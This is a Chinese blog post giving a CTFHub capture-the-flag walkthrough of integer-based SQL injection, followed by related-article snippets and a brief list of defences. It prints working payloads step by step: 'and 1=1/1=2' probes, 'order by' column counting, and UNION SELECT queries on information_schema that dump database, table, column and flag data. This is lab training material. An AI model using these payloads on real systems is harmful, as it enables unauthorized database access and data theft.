【ctfhub】sql整数型注入

最新推荐文章于 2024-03-29 16:48:00 发布
最新推荐文章于 2024-03-29 16:48:00 发布
阅读量260 收藏 2
点赞数
文章标签: sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyhyxyx/article/details/131927186
版权

整数型注入

在这里插入图片描述

(一)判断是否有注入漏洞:

在1后加一个’ 无回显
输入id=1 and 1=1 出现回显
将1=1变为1=2—》语句正确但是无法访问数据库(图三)
【可判定此处有整数注入漏洞】

在这里插入图片描述

(二)判断字段数量:

输入id=1 order by 2 看字段数量是否是两个
没有报错,证明字段的个数为2
【用order by来判断字段的个数,可以从10开始,利用二分法,一直试到2】

在这里插入图片描述

(三)查找需要的数据的位置:

通过union,即输入

/?id=-1 union select 1,2

在这里插入图片描述

可以发现需要的数据在2的位置

(四)查找数据库名

查找当前数据库名:

/?id=-1 union select 1,database()

在这里插入图片描述

查找所有数据库名:

?id=-1 union select 1,group_concat(schema_name)from information_schema.schemata

在这里插入图片描述

(五)获取数据库的表名

获取当前数据库所有的表名

/?id=-1 union select 1,group_concat(table_name) from information_schema.table where table_schema='sqli'

在这里插入图片描述

得出flag中的所有字段

/?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

在这里插入图片描述

获取flag中的所有数据

/?id=-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述
得到答案

hyhyxyx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL字符型注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入整数型注入
noob_3000的博客
08-07 2866
CTFHUB整数型SQL注入
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2232
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
sql注入整数型注入
最新发布
2401_82760239的博客
03-29 884
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1486
SQL注入原理-数值型注入
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2430
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
sql注入(整型、字符型、报错)
Xiiaogu的博客
11-10 369
1.从1开始输入数字判断字段数,输入3时报错,说明只有两个字段。2.将1改为-1,输入-1 union select 1,2 ,观察到Data发生变化,因此显示位是Data。3.接着查询数据库名,输入-1 union select 1,group_concat(schema_name) from information_schema.schemata查出数据库名为sqli。4.接着查询数据库表名,输入。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2170
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
CTFHub 整数型SQL注入
Leon~博客
03-08 5648
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1142
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub技能树--整型注入
qq_59099375的博客
06-18 88
3.开始爆破库名,通过联合查询语句,联合查询之前的值设为一个不存在的值,不然显示不出来。4.通过group_concat()函数和information_schema爆破表名,1.按照题目要求输入1出现回显,首先判断是否有注入点,由于题目指明了整型注入。2.判断回显位,输入1和2是有回显的,输入3报错可知该表中字段只有两列。得到两个表名,可想而知我们的flag存在flag表中。得到数据库名为sqli。6.开始爆破具体内容。
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3249
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
ctfhubSQL整数型注入(借助sqlmap工具)
hwy2506451901的博客
04-05 993
关于这道题呢,我还没有看到用sqlmap工具解答的,正好刚刚做完,感觉还挺简单的,所以决定分享一下过程,大佬可以绕过啦嘿嘿嘿,大家也可以去下载一个试试这个工具,希望能有一点帮助吧! 我们启动环境,进入网址看到让我们输入一个1试试,那我们就输入试试吧 可以看到我们输入的id写在了地址栏当中,说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法: 1.检查是否存在漏洞: 将地址栏的...
web安全学习-------2.sql整数型注入
阿柠xn
03-10 318
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。 我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。 接着我们测试一下数据有几列: 测试列数: GET:id=1 order by 3# POST:id=1’ order by 3# 我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。 接下来就是尝试联合查询了,记得把前面的查询数据置空...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值